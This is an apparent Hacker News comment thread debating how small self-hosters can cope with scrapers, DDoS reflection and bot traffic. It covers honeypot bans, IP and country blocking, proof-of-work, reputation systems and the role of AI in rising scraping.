People in games do this where they DDoS each other. You can get access to a DDoS panel for as little as $5 a month.
Some providers allow for spoofing the src ip, that's how they do these reflection attacks. So you're not actually dropping the sender of these packets, but the victims.
These are spoofed packets for SYNACK reflection attacks. Your response traffic goes to the victim, and since network stacks are usually configured to retry SYNACK a few times, they also get amplification out of it
I wonder if you can have a chain of "invisible" links on your site that a normal person wouldn't see or click. The links can go page A -> page B -> page C, where a request for C = instant IP ban.
I self host and I have something like this but more obvious: i wrote a web service that talks to my mikrotik via API and add the IP of the requester to the block list with a 30 day timeout (configurable ofc). It hostname is "bot-ban-me.myexamplesite.com" and it is like a normal site in my reverse proxy. So when I request a cert this hostname is in the cert, and in the first few minutes i can catch lots of bad apples. I do not expect anyone to ever type this. I do not mention the address or anything anywhere, so the only way to land there is to watch the CT logs.
We do something similar for ssh. If a remote connection tries to log in as "root" or "admin" or any number of other usernames that indicate a probe for vulnerable configurations, that's an insta-ban for that IP address (banned not only for SSH but for everything).
Scrapers nowadays can use residential and mobile IPs, so banning by IP, even if actual malicious requests are coming from them, can also prevent actual unrelated people from accessing your service.
How can a scraper get a mobile IP address?
Unless you're running a very popular service, unlikely that a random residential IP would be both compromised by a malicious VPN and also trying to access your site legitimately.
There was an article just yesterday which detailed doing this as not in order to ban but in order to waste time. You can also zip bomb people which is entertaining but probably not super effective.
https://herman.bearblog.dev/messing-with-bots/
https://news.ycombinator.com/item?id=45935729
I do something like this. Every page gets an invisible link to a honeypot. Click the link, 48hr ban.
Honestly I have no idea how well it works, my logs are still full of bots. *Slow* bots, though. As long as they’re not ddosing me I guess it’s fine?
IP addresses from scrapers are innumerable and in constant rotation.
I very much relate to the author's sour mood and frustration. I also host a small hobby forum and have experienced the same attacks constantly, and it has gotten especially bad the last couple of years with the rise of AI.
In the early days I put Google Analytics on the site so I could observe traffic trends. Then, we were all forced to start adding certificates to our sites to keep them "safe".
While I think we're all doomed to continue that annual practice or get blocked by browsers, I have often considered removing Google Analytics. Ever since their redesign it is essentially unusable for me now. What benefit does it bring if I can't understand the product anymore?
Last year, in a fit of desperation, I added Cloudflare. This has a brute force "under attack" mode that seems to stop all bots from accessing the site. It puts up a silly "hang on a second, are you human" page before the site loads, but it does seem to work. It is great UX? No, but at least the site isn't getting hammered by various locations in Asia. Cloudflare also let me block entire countries, although that seems to be easily fooled.
I also don't think a lot of the bots/AI crawlers honor the rules set in the robots.txt. It's all an honor system anyway, and they are completely lacking in it.
There need to be some hard and fast rules put in place, somehow, to stop the madness.
I don't know if there's a simple solution to deploy this but JA3 fingerprinting is sometimes used to identify similar clients even if they're spread across IPs: https://engineering.salesforce.com/tls-fingerprinting-with-j...
When ever was the internet a safe haven, from what exactly?
I wonder if a proof of work protocol is a viable solution. To GET the page, you have to spend enough electricity to solve a puzzle. The question is whether the threshold could be low enough for typical people on their phones to access the site easily, but high enough that mass scraping is significantly reduced.
There's this paper from 2004: "Proof-of-Work Proves Not to Work": https://www.cl.cam.ac.uk/~rnc1/proofwork.pdf
The conclusion back then was that it's impossible to make a threshold that is both low enough and high enough.
You need some other mechanism that can distinguish bad traffic from good (even if imperfectly), and then adjust the threshold based on it. See, for instance, "Proof of Work can Work": https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
Thanks for these references! I imagine the numbers would be entirely different in our context (20 years later and web serving, not email sending). And the idea of spammers using bot nets (therefore not paying for computer themselves) would be less relevant to LLM scraping. But I’ll try to check for forward references on these.
I feel like it could work. If you think about it, you need the cost to the client to be greater than the cost to the server. As long as that is true the server shouldn't mind about increased traffic because it's making a profit!
Very crudely if you think that a request costs the server ~10ms of compute time and a phone is 30x slower then you'd need 300ms of client compute time to equal it which seems very reasonable.
The only problem is you would need a cryptocurrency that a) lets you verify tiny chunks of work, and b) can't be done faster than you can do it on a phone using other hardware, and c) lets a client mine money without being to actually spend it ("homomorphic mining"?).
I don't know if anything like that exists but it would be an interesting problem to solve.
I'am sorry but it literally didnt works as other commenter cited
because if you make the requirement like that, its basically cancel out the other effect
> Other things I’ve noticed is increased traffic with Referer headers coming from strange websites such as bioware.com, mcdonalds.com, and microsoft.com
I've been seeing this too, I guess scrapers think they can get through some blockers with a referrer?
I wonder why is it that we get an increase in these automated scrapers and attacks as of late (some few years); is there better (open-source?) technology that allows it? Is it because hosting infrastructure is cheaper also for the attackers? Both? Something else?
Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access to our websites, not machines.
What's missing is effective international law enforcement. This is a legal problem first and foremost. As long as it's as easy as it is to get away with this stuff by just routing the traffic through a Russian or Singaporean node, it's going to keep happening. With international diplomacy going the way it has been, odds of that changing aren't fantastic.
The web is really stuck between a rock and a hard place when it comes to this. Proof of work helps website owners, but makes life harder for all discovery tools and search engines.
An independent standard for request signing and building some sort of reputation database for verified crawlers could be part of a solution, though that causes problems with websites feeding crawlers different content than users, an does nothing to fix the Sybil attack problem.
> What's missing is effective international law enforcement.
International law enforcement on the Internet would also subject you to the laws of other countries. It goes both ways.
Having to comply with all of the speech laws and restrictions in other countries is not actually something you want.
We have historically solved this via treaties.
If you want to trade with me, a country that exports software, let's agree to both criminalize software piracy.
No reason why this can't be extended to DDoS attacks.
This is already kind of true with every global website, the idea of a single global internet is one of those fairy tale fantasy things, that maybe happened for a little bit before enough people used it. In many cases it isn't really ideal today.
Good points; I would definitely vouch for an independent standard for request signing + some kind of decentralized reputation system. With international law enforcement, I think there could be too many political issues for it not become corrupt
I don’t think this can solved legally without compromising anonymity. You can block unrecognized clients and punish the owners of clients that behave badly, but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Maybe pseudo-anonymity and “punishment” via reputation could work. Then an oppressive government with access to a subversive website (ignoring bad security, coordination with other hijacked sites, etc.) can only poison its clients’ reputations, and (if reputation is tied to sites, who have their own reputations) only temporarily.
> but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Already happens. Oppressive governments already punish people for visiting "wrong" websites. They already censor internet.
There are no technological solutions to coordination problems. Ultimately, no matter what you invent, it's politics that will decide how it's used and by whom.
It's not necessarily going through a Russian or Singaporean node though, on the sites I'm responsible for, AWS, GCP, Azure are in the top 5 for attackers. It's just that they don't care _at all_ about that happening.
I don't think you need world-wide law-enforcement, it'll be a big step ahead if you make owners & operators liable. You can limit exposure so nobody gets absolutely ruined, but anyone running wordpress 4.2 and getting their VPS abused for attacks currently has 0 incentive to change anything unless their website goes down. Give them a penalty of a few hundred dollars and suddenly they do. To keep things simple, collect from the hosters, they can then charge their customers, and suddenly they'll be interested in it as well, because they don't want to deal with that.
The criminals are not held liable, and neither are their enablers. There's very little chance anything will change that way.
The big cloud provides needs to step up and take responsibility. I understand that it can't be to easy to do, but we really do need a way to contact e.g. AWS and tell them to shut of a costumer. I have no problem with someone scraping our websites, but I care that they don't do so responsibly, slow down when we start responding slower, don't assume that you can just go full throttle, crash our site, wait, and then do it again once we start responding again.
You're absolutely right: AWS, GCP, Azure and others, they do not care and especially AWS and GCP are massive enablers.
> we really do need a way to contact e.g. AWS and tell them to shut of a costumer.
You realize you just described the infrastructure for far worse abuse than a misconfigured scraper, right?
Using AI you can write a naive scraper in minutes and there's now a market demand for cleaned up and structured data.
I'm pretty sure it is the commercial demand for data from AI companies. It is certainly the popular conception among sysadmins that it is AI companies who are responsible for the wave of scrapers over the past few years, and I see no compelling alternative.
> and I see no compelling alternative.
Another potential cause: It's way easier for pretty much any person connected to the internet to "create" their own automation software by using LLMs. I could wager even the less smart LLMs could handle "Create a program that checks this website every second for any product updates on all pages" and give enough instructions for the average computer user to be able to run it without thinking or considering much.
Multiply this by every person with access to an LLM who wants to "do X with website Y" and you'll get an magnitude increase in traffic across the internet. This been possible since what, 2023 sometime? Not sure if the patterns would line up, but just another guess for the cause(s).
long-term solution
How about a reputation system?
Attached to IP address is easiest to grok, but wouldn't work well since addresses lack affinity. OK, so we introduce an identifier that's persistent, and maybe a user can even port it between devices. Now it's bad for privacy. How about a way a client could prove their reputation is above some threshold without leaking any identifying information? And a decentralized way for the rest of the internet to influence their reputation (like when my server feels you're hammering it)?
Do anti-DDoS intermediaries like Cloudflare basically catalog a spectrum of reputation at the ASN level (pushing anti-abuse onus to ISP's)?
This is basically what happened to email/SMTP, for better or worse :-S.
It's ironic to use reputation system for this.
20+ years ago there were mail blacklists that basically blocked residential IP blocks as there should not be servers trying to send normal mail from there. Now you must try the opposite, blacklist blocks where only servers and not end users can come from, as there is potentially bad behaved scrapers in all major clouds and server hosting platforms.
But then there are residential proxies that pay end users to route requests from misbehaved companies, so that door is also a bad mitigation
It's interesting that along another axis, the inertia of the internet moved from a decentralized structure back toward something that resembles mainframes. I don't think those axes are orthogonal.
Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
Services need the ability to obtain an identifier that:
- Belongs to exactly one real person.
- That a person cannot own more than one of.
- That is unique per-service.
- That cannot be tied to a real-world identity.
- That can be used by the person to optionally disclose attributes like whether they are an adult or not.
Services generally don’t care about knowing your exact identity but being able to ban a person and not have them simply register a new account, and being able to stop people from registering thousands of accounts would go a long way towards wiping out inauthentic and abusive behaviour.
The ability to “reset” your identity is the underlying hole that enables a vast amount of abuse. It’s possible to have persistent, pseudonymous access to the Internet without disclosing real-world identity. Being able to permanently ban abusers from a service would have a hugely positive effect on the Internet.
A digital "Death penalty" is not a win for society, without considering a fair way to atone for "crimes against your digital identity".
It would be way to easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans People? Atheists? Random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Describing “I don’t want to provide service to you and I should have the means of doing so” as a “digital death penalty” is a tad hyperbolic, don’t you think?
> It would be way to easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans People? Atheists? Random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Authoritarian regimes can already do that.
I think perhaps you might’ve missed the fact that what I was suggesting was individual to each service:
> Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
I was saying don’t care about what people are doing elsewhere on the Internet. Just ban locally – but persistently.
If creating an identity has a cost, then why not allow people to own multiple identities? Might help on the privacy front and address the permadeath issue.
Of course everything sounds plausible when speaking at such a high level.
I agree and think the ability to spin up new identities is crucial to any sort of successful reputation system (and reflects the realities of how both good and bad actors would use it). Think back to early internet when you wanted an identity in one community (e.g. forums about games you play) that was separate from another (e.g. banking). But it means those reputation identities need to take some investment (e.g. of time / contribution / whatever) to build, and can't become usefully trusted until reaching some threshold.
Because of course what this world needs is for the wealthy to have even more advantages over the normies. (Hint: If you're reading this, and think you're one of the wealthy ones, you aren't)
Zero knowledge proof constructs have the potential to solve these kind of privacy/reputation tradeoffs.
I guess it is just because 1) They can, and 2) Everyone wants some data. I think it would be interesting if every website out there starts to push out BS pages just for scrappers. Not sure how much extra cost it's going to take if a website puts up say 50% BS pages that only scrappers can reach, or BS material with extremely small fonts hidden in regular pages that ordinary people cannot see.
Something like https://blog.cloudflare.com/ai-labyrinth/ ?
Why? It’s because of AI. It enables attacks at scale. It enables more people to attack, who previously couldn’t. And so on.
It’s very explainable. And somehow, like clockwork, there are always comments to say “there is nothing new, the Internet has always been like this since the 80s”.
You know, part of me wants to see AI proliferate into more and more areas, just so these people will finally wake up eventually and understand there is a huge difference when AI does it. When they are relentlessly bombarded with realistic phone calls from random numbers, with friends and family members calling about the latest hoax and deepfake, when their own specific reputation is constantly attacked and destroyed by 1000 cuts not just online but in their own trusted circles, and they have to put out fires and play whack-a-mole with an advanced persistent threat that only grows larger and always comes from new sources, anonymous and not.
And this is all before bot swarms that can coordinate and plan long-term, targeting specific communities and individuals.
And this is all before humanoid robots and drones proliferate.
Just try to fast-forward to when human communities online and offline are constantly infiltrated by bots and drones and sleeper agents, playing nice for a long time and amassing karma / reputation / connections / trust / whatever until finally doing a coordinated attack.
Honestly, people just don’t seem to get it until it’s too late. Same with ecosystem destruction — tons of people keep strawmanning it as mere temperature shifts, even while ecosystems around the world get destroyed. Kelp forests. Rainforests. Coral reefs. Fish. Insects. And they’re like “haha global warming by 3 degrees big deal. Temperature has always changed on the planet.” (Sound familiar?)
Look, I don’t actually want any of this to happen. But if they could somehow experience the movie It’s a Wonderful Life or meet the Ghost of Christmas Yet to Come, I’d wholeheartedly want every denier to have that experience. (In fact, a dedicated attacker can already give them a taste of this with current technology. I am sure it will become a decentralized service soon :-( )
Our tech overlords understand AI, especially any form of AGI, will basically be the end of humanity. That’s why they’re entirely focused on being the first and amassing as much wealth in the meanwhile, giving up on any sort of consideration whether they’re doing good for people or not.
Isn’t this problem why Cloudflare is popular? You can write your own server, but outsource protecting it from bots.
Perhaps there are better alternatives?
Unpopular opinion: the real source of the problem is not scrapers, but your unoptimized web software. Gitea and Fail2ban are resource hogs in your case, either unoptimized or poorly configured.
My tiny personal web servers can whistand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers are causing any issue.
"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.
sad but hosting static content like his site in a cloud would save him headache. i know i know must "do it yourself" but if that is his path he knows the price. maybe i am wrong and do not understand the problem but it seems like asking for a headache.
I think the author would agree, and is in fact the point of his post.
The only way to solve these problems is using some large hosted platform where they have the resources to constantly be managing these issues. This would solve their problem.
But isn't it sad that we can't host our own websites anymore, like many of us used to? It was never easy, but it's nearly impossible now and this is only one reason.
i think it has been a hard to host a site since about 2007. i stopped then because it is too much work to keep it safe. even worse now but it has always been extra work since search engines. maybe the OP is just getting older and wants to spend time with his kids and not play with nginx haha.
I run a dedicated firewall/dns box with netfilter rules to rate limit new connections per IP. It looks like I may need to change that to rate limit per /16 subnet...
The Internet has really been an interesting case study for what happens between people when you remove a varying number of layers of social control.
All the way back to the early days of Usenet really.
I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.
"Socialists"* argue for more regulations; "liberals" claim that there should be financial incentives to not do that.
I'm neither. I believe that we should go back to being "tribes"/communities. At least it's a time-tested way to – maybe not prevent, but somewhat allieviate – the tragedy of the commons.
(I'm aware that this is a very poor and naive theory; I'll happily ditch it for a better idea.)
--
*) For the lack of a better word.
The problem with anything, anything, without a centralized authority, is that friction overwhelms inertia. Bad actors exist and have no mercy, while good people downplay them until it’s too late. Entropy always wins. Misguided people assume the problem is powerful people, when the problem is actually what the powerful people use their authority to do, as powerful people will always exist. Accepting that and maintaining oversight is the historically successful norm; abolishing them has always failed.
As such, I don’t identify with the author of this post, about trying to resist CloudFlare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates, does not exist any more than a country without a government where everyone plays nice and mostly cooperates. It’s wishful thinking. We already tried this with Email, and we’re back to gatekeepers. Pretending the web will be different is ahistorical.
The internet has made the world small and that's a problem. Nation states typically had a limited range of broadcasting their authority in the more distant past. A bad ruler couldn't rule the entire world, nor could they cause trouble with the entire world. From nukes to the interconnected web the worst of us with power can effect everyone else.
Power is a spectrum. Power differentials will always exist but we can absolutely strive to make them smaller and smaller.
1) Most of the civilized world no longer has hereditary dictators (such as "kings"). Because they were removed from power by the people and the power was distributed among many individuals. It works because malicious (anti-social) individuals have trouble working together. And yes, oversight helps.
But it's a spectrum and we absolutely can and should move the needle towards more oversight and more power distribution.
2) Corporate power structures are still authoritarian. We can change that too.
The Internet was a scene, and like all scenes it's done now the corpos have moved in and taken over (because at that point it's just ads and rent extraction in perpetuity). I dunno what/where/when the next tech scene will be, but I do know it's not going to come from Big Tech. See: Metaverse.
Had to ban RU, CN, SG, and KR just cos of the volume of spam. The random referer headers has recently become a problem.
This is particularly annoying as knowing where people come from is important.
Its just another reason to give up making stuff, and give in to the FAANG and the AI enshittification.
:-(
If you only care about regular users I'd advice banning all known datacenters, Browserbase, China and Brazil.
I also banned the middle east, Logs actually reflected real users, cost dropped, and my mental health improved.
Win Win.
the internet is over. If we want to recapture the magic of the earlier times we are going to have to invent something new.
The magical times in the past have always been marked with being able to be part of an "exclusive club" that takes something from nothing to changing the world.
Because of the internet, magical times can never be had again. You can invent something new, but as soon as anyone finds out about it, everyone now finds out about it. The "exclusive club" period is no more.
> magical times can never be had again
Yes, they can. But we need to admit to ourselves that people are not equal. Not just in terms of skill but in terms of morality and quality of character. And that some people are best kept out.
Corporations, being amoral, should also be kept out.
---
The old internet was the way it was because of gate keeping - the people on it were selected through technical skill being required. Generally people who are builder types are more pro-social than redistributor types.
Any time I've been in a community which felt good, it was full of people who enjoyed building stuff.
Any time such a community died, it was because people who crave power and status took it over.
Third spaces and the free time to explore them?
No no, that doesn't maximize shareholder value.
Haha, you could host on Gemini instead of HTTP. You’d simulate the old internet in that only enthusiasts would come!
There is no something new. Anything we invent will be able to be taken over by complex bots. Welcome to the futureshock where humans aren't at the top of their domain.
going back to Gopher?
Gopher still requires the Internet. I know it's pretty common to conflate "the Internet" with "the World Wide Web", but there are actually other protocols out there (like Gopher).
I don't see a solution then.
Why would that help?
The internet hasn't been a safe haven since the 80s, or maybe earlier (that was before my time, and it's never been one since I got online in the early 90s).
The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
Given that the World Wide Web was invented in 1989... are you saying that the Internet was safer when only FTP and Usenet existed?
Was it a safe haven or was it less safe but simply an unprofitable target?
> The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
Apple and Alphabet seem positioned to easily enable it.
https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
Alphabet the company that bans people for opaque reasons with no recourse, good idea. Maybe tech should not be in charge of digital identification
The governments like it that way. They want banks and tech companies to be intermediaries that are more difficult to hold accountable, because they can just say “we didn’t feel like doing business with this person”.
I don’t get it. That link refers to Apple letting you put your passport and drivers license info in the wallet on your phone.
Apple’s Wallet app presents this feature as being for “age and identity verification in apps, online and in person”.
The real internet has yet to be invented.
It's probably just time for the web page to die
What do you mean by that? Web pages is the central mechanism, we use to put information on the web. Of course many websites are shitty and could be much simpler to convey their information, without looking crap at all. But the web page in general? Why would we ever get rid of something so useful? And what do you suggest as an alternative?
...they said, on a web page.
Common man never had a need for internet or global connectedness. DARPA wanted to push technology to gain upper hand in the world matters. Universities pushed technology to show progress and sell research. Businesses pushed technologies to have more sales. It was kind of acid rain that was caused by the establishments and sold as scented rain.
This sentiment - along the lines of "the world became too dependent on the Internet", "Internet wasn't a good thing to begin with", "Internet is a threat to national security" etc - has been popping up on HN too often lately, emerged too abruptly and correlates with the recent initiatives to crack down on the Internet too well.
If this is your own opinion and not a part of a psyop to condition people into embracing the death of the Internet as we know it, do you have any solution to propose?
You don't need to have a solution to explore a problem in my opinion. OP comment is problematic but for reasons other than not having a proposed solution.
> Common man never had a need for internet or global connectedness
That's not how culture evolves. You don't necessarily need to have a problem so that a solution is developed. You can very well have a technology developed for other purposes, or just for exploration sake, and then as this tech exists uses for it start to pop post hoc.
You therefore ignore the immense benefit of access to information that technology has, something that wasn't necessarily a problem for the common man but once its there, the popularization of the access to information, they adapt and grow dependent on it. Just like electricity.
>>immense benefits ??
People with dialup telephones never asked for a smartphone connected to internet. They were just as happy back then or even more happy because phone didn't eat off their time or cause posture problems.
Sure, shopping was slower without amazon website, but not less happy experience back then. Infact homes had less junk and people saved more money
Messaging? sure it makes you spend time with 100 whatsapp groups, where 99% of the people don't know you personally.
It helped companies to sell more of the junk more quickly.
It created bloggers and content creators who lived in an imaginary world thinking that someone really consumes their content.
It created karma beggers who begged globally for likes that are worth nothing.
It created more concentration of wealth at some weird internet companies, which don't solve any of the world problems or basic needs of the people.
And finally it created AI that pumps plastic sewage to fill the internet. There it is, your immensely useful internet.
As if the plastic pollution was not enough in the real world, the internet will be filled with plastic content.
What else did internet give that is immensely helpful?